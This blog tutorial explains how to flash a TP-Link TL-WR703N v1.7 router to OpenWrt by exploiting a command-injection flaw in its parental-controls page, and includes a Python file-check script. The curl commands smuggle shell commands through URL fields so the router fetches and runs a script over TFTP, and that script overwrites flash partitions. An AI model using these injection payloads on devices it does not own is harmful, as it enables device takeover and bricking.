Flashing TP-Link TL-WR703N v1.7 to OpenWrt
The TP-Link TL-WR703N is an affordable 3G-capable travel router that can provide wireless access for your devices while you are in a hotel (with wired LAN) or on the move (using a supported USB 3G dongle). I got a couple of these for less than US$17 each. This little gem supports third-party firmware such as OpenWrt and dd-wrt.
Flashing the TL-WR703N to OpenWrt is easy for the version 1.6 hardware as you can simply perform a firmware upgrade (to OpenWrt) through the TP-Link’s Web administration page.
However, this is no longer possible on the TL-WR703N with version 1.7 hardware on firmware 3.17.1 Build 140120 Rel.56593n. Firstly, the U-Boot was changed for the TL-WR703N v1.7. Secondly, the official firmware no longer allows a firmware upgrade to OpenWrt via the TP-Link’s Web administration page. Attempts to do so usually result in bricking the TL-WR703N, and the only way to recover is to re-flash it via its serial interface.
The proper way to flash the TL-WR703N v1.7 is to leverage an exploit on the parental controls page (credit to BUGBLUE). It allows you to run privileged commands on the TL-WR703N v1.7 to:
- Transfer both the kernel and rootfs image of OpenWrt firmware
- Flash the kernel partition
- Flash the rootfs partition
The instructions were a little unclear, so I am documenting them here for (my) future reference.
Getting the Required Stuff
To flash the TL-WR703N v1.7 to OpenWrt, you will need the following:
- TL-WR703N v1.7 on firmware 3.17.1 Build 140120 Rel.56593n
- OpenWrt firmware for TL-WR703N [download]
- cURL to send crafted HTTP requests [download]
- dd to split the OpenWrt into kernel and rootfs image [download]
- TFTP server [download]
- A shell script to instruct the router to perform the flashing. You will need an editor (e.g. Notepad++) to create the shell script with Unix-style line endings
- busybox 1.16.1 for mips [download]
Preparing the Stuff to exploit the TL-WR703N
Splitting the OpenWrt firmware into kernel and rootfs
    dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
    dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
Creating the shell script “aa”
Create a file named “aa” (without the quotes and extension) with the following contents. Alternatively, you can download the aa file (remember to unzip it).
    cd /tmp
    # fetch the kernel image, the rootfs image and busybox from the TFTP server
    tftp -gl i1 192.168.1.9
    tftp -gl i2 192.168.1.9
    tftp -gl busybox 192.168.1.9
    chmod 755 busybox
    # write the kernel and rootfs partitions, then force a reboot
    ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
    ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
    ./busybox reboot -f
Renaming the busybox-mips
Rename the “busybox-mips” you have downloaded earlier to “busybox”
Setting your LAN address on your computer
The exploit command and the shell script (aa) both communicate with the address 192.168.1.9. You can either set this static IP on your computer or modify the address in the exploit command and shell script. Your choice!
Setting up the TFTP server with the required files
By now, you would have the following 4 files:
- aa
- i1
- i2
- busybox
Extract and execute the TFTP server and point the document root to the folder containing the above 4 files.
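Because a bad file at this point ends in a bricked router, it is worth checking the four files before going further. The following is an added example, not part of the original instructions: it performs the same 1 MiB split as the dd commands above, then checks that i1 and i2 reassemble to the original image, that aa has Unix line endings and that busybox is an ELF binary. The function names and the sample files in demo() are made up for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

KERNEL_SIZE = 1048576  # split offset used by the dd commands on this page


def split_firmware(image: Path, outdir: Path) -> str:
    """Write i1 (first 1 MiB) and i2 (remainder); return the image SHA-256."""
    data = image.read_bytes()
    if len(data) <= KERNEL_SIZE:
        raise ValueError("image is not larger than 1 MiB: wrong or truncated file")
    (outdir / "i1").write_bytes(data[:KERNEL_SIZE])
    (outdir / "i2").write_bytes(data[KERNEL_SIZE:])
    return hashlib.sha256(data).hexdigest()


def preflight(image: Path, tftp_root: Path) -> list:
    """Return a list of problems; an empty list means the files are consistent."""
    missing = [n for n in ("aa", "i1", "i2", "busybox") if not (tftp_root / n).is_file()]
    if missing:
        return ["missing file: " + n for n in missing]
    problems = []
    i1 = (tftp_root / "i1").read_bytes()
    i2 = (tftp_root / "i2").read_bytes()
    if len(i1) != KERNEL_SIZE:
        problems.append(f"i1 is {len(i1)} bytes, expected {KERNEL_SIZE}")
    if i1 + i2 != image.read_bytes():
        problems.append("i1 + i2 does not reassemble to the original image")
    if b"\r" in (tftp_root / "aa").read_bytes():
        problems.append("aa contains CR characters: save it with Unix line endings")
    if (tftp_root / "busybox").read_bytes()[:4] != b"\x7fELF":
        problems.append("busybox is not an ELF binary (bad download?)")
    return problems


def demo() -> tuple:
    root = Path(tempfile.mkdtemp())
    image = root / "factory.bin"
    image.write_bytes(b"K" * KERNEL_SIZE + b"R" * 4096)  # constructed stand-in image
    split_firmware(image, root)
    (root / "busybox").write_bytes(b"\x7fELF" + b"\0" * 12)  # constructed ELF stub
    (root / "aa").write_bytes(b"cd /tmp\r\ntftp -gl i1 192.168.1.9\r\n")  # CRLF on purpose
    bad = preflight(image, root)
    (root / "aa").write_bytes(b"cd /tmp\ntftp -gl i1 192.168.1.9\n")  # fixed line endings
    return bad, preflight(image, root)

if __name__ == "__main__":
    print(demo())
```

The SHA-256 returned by split_firmware can be compared with any checksum published alongside the firmware download.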
Pulling the exploit and upgrading TL-WR703N to OpenWrt
Connecting up the equipment and factory resetting the router
- Connect the LAN cable to both your computer and the TL-WR703N.
- Power on the TL-WR703N.
- Through the TP-Link Web administration page, perform a factory reset for TL-WR703N.
Performing the exploit and upgrade
Ensure that your computer is set to static address 192.168.1.9.
- On your command prompt, navigate to the directory containing cURL.
- Execute the following commands (those lines starting with # are comments which need not be executed).

      curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true" "http://192.168.1.1/"
      curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1"
      curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6"
      # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
- Once the power LED stops blinking, access the OpenWrt Web administration at http://192.168.1.1.
- Enjoy your TL-WR703N v1.7 on OpenWrt.
Upgrading OpenWrt in the Future
Take care when upgrading the firmware in the future, as the U-Boot has not been replaced. You should not reset settings or reset to factory default in any situation.